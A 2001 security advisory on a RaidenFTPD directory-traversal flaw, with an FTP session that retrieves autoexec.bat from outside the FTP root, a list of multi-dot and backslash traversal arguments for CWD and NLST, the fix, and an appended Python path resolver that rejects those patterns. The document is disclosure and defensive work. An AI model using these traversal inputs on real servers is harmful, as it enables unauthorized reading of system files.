Vulnerabilities in RaidenFTPD Server

Overview

RaidenFTPD v2.1 is an ftp server available from
http://playstation2.idv.tw/raidenftpd. Vulnerabilities exist which allow
users to break out of the ftp root.

Details

The following is an illustration of the problem:

    > ftp localhost
    220-This FTP site is running free version of RaidenFTPD
    220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-site/
    220-Download english version from http://playstation2.idv.tw/raidenftpd/
    220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
    220-This server is for private use only
    220-If you do not have access to this server
    220-Please disconnect now
    220 Please enter your login name now.
    User (xxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog .
    Password:

    [really long login banner edited out]

    230 User jdog logged in , proceed.
    ftp> get ....\....\autoexec.bat
    200 Port command ok.
    150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
    226-Ñ+ª+¦s+uññ_zª@ ñU¦¦ : 419 ª_ñ+_+ ñW¦¦ : 0 ª_ñ+_+
    226-¦¦½ßñ@ª+ñU¦¦¬¦¦t½+¼O : 419 kb/sec _zª¦ Unlimited kb ¬¦ñU¦¦+B½+
    226-Ñ+½e¬¦Ñ++²¼O /
    226 Transfer finished successfully. Data connection closed.
    ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
    ftp> cd ....
    250-ª¦Ñ++²¦-ñU¬+¦í 1323 mb
    250 "/.." is current directory.

This excerpt was taken from a session involving build #947. The vendor
released four builds since I initially contacted them to address
additional variations. The following is a list of vulnerabilities which
affected these intermediate versions:

    CWD \....
    CWD *\.....
    CWD /..../
    NLST ..
    NLST ...
    NLST \..\
    NLST \...\

Solution

Upgrade to build #952 at:
http://playstation2.idv.tw/raidenftpd/download.html

Vendor Status

Team JohnLong was contacted via <jlkat_private> on Friday, April 20, 2001.
They quickly responded and worked diligently on the problems until all
issues were fixed.
- Joe Testa

e-mail:   joetestaat_private
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron
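Added example (not part of the original advisory, and not RaidenFTPD's code): one way a server can resolve FTP path arguments so that the multi-dot and backslash patterns listed in the advisory cannot leave the FTP root. The root C:\ftproot and the names PathRejected, resolve, to_real and classify are assumptions made for this example.

```python
import ntpath  # Windows path rules, importable on any platform

ROOT = r"C:\ftproot"  # hypothetical FTP root, assumed for this example


class PathRejected(ValueError):
    """Raised when a path argument is refused."""


def resolve(cwd, arg):
    """Resolve an FTP path argument to a normalized virtual path under "/"."""
    arg = arg.replace("\\", "/")  # "\" and "/" go through the same checks
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if parts:
                parts.pop()  # at the virtual root, ".." stays at the root
            continue
        # Dot-only names ("...", "....") and names ending in a dot or space
        # are refused instead of being handed to the OS for interpretation.
        if comp.strip(". ") == "" or comp[-1] in ". ":
            raise PathRejected(comp)
        parts.append(comp)
    return "/" + "/".join(parts)


def to_real(vpath):
    """Map a resolved virtual path to a real path; recheck it is under ROOT."""
    real = ntpath.normpath(ntpath.join(ROOT, *vpath.strip("/").split("/")))
    if real != ROOT and not real.startswith(ROOT + "\\"):
        raise PathRejected(vpath)
    return real


# Arguments taken from the advisory's session and command list.
ADVISORY_ARGS = ["....\\....\\autoexec.bat", "....", "\\....", "*\\.....",
                 "/..../", "..", "...", "\\..\\", "\\...\\"]


def classify(args, cwd="/"):
    """Return {argument: resolved virtual path, or None if refused}."""
    out = {}
    for a in args:
        try:
            out[a] = resolve(cwd, a)
        except PathRejected:
            out[a] = None
    return out
```

Every command handler (CWD, NLST, RETR and so on) should call the same resolver, since the advisory shows variants that were fixed for one command still working through another.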
This archive was generated by hypermail 2b30 : Wed Apr 25 2001 - 23:12:04 PDT